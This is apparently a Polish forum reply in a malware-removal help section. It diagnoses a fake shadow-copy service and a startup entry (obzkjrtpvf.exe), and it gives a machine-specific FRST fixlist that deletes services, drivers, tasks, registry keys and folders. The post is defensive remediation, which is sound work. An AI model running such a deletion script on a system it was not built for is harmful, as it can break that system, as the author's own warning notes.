Tak, ta sama infekcja co w przypadku reszty świeżych tematów, czyli usługa udająca inną usługę systemową związaną z cieniowaniem woluminów. U Ciebie jest dodatkowo jeszcze drugi element w Autostarcie (obzkjrtpvf.exe). Akcje do przeprowadzenia: 1. Otwórz Notatnik i wklej w nim: R2 VSSS; C:\Users\Anna\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe [104008064 2015-06-23] (Microsoft Corporation) [File not signed] R4 AVGIDSHA; system32\DRIVERS\avgidsha.sys [X] R4 Avgrkx64; system32\DRIVERS\avgrkx64.sys [X] R4 KProcessHacker2; \??\C:\Program Files\kprocesshacker.sys [X] Startup: C:\Users\Anna\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\g.lnk [2015-06-14] ShortcutTarget: g.lnk -> C:\Users\Anna\AppData\Roaming\obzkjrtpvf.exe () HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1 HKLM\...\Policies\Explorer: [HideSCAHealth] 1 Task: {63CF779D-5D23-483E-9D16-C19D4F011195} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Anna) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Anna).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe C:\Program Files\Common Files\AV C:\ProgramData\AVG2015 C:\Users\Anna\AppData\Local\Avg C:\Users\Anna\AppData\Local\Avg2015 C:\Users\Anna\AppData\Roaming\Microsoft\SystemCertificates\VSSVC.exe C:\Users\Default\AppData\Roaming\TuneUp Software EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Wejdź w Tryb awaryjny Windows. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Nadal siedząc w Trybie awaryjnym zastosuj AVG Remover. 3. Opuść Tryb awaryjny. Zrób nowe logi: FRST z opcji Scan (bez Addition i Shortcut) + Farbar Service Scanner. Dołącz też plik fixlog.txt.

Zasady działu jakie raporty tu się dostarcza (FRST i GMER): KLIK. Przestarzały OTL nie jest tu brany pod uwagę.

Przeklej raporty ze skanerów co wykryły - chodzi o dane tekstowe a nie zdjęcia.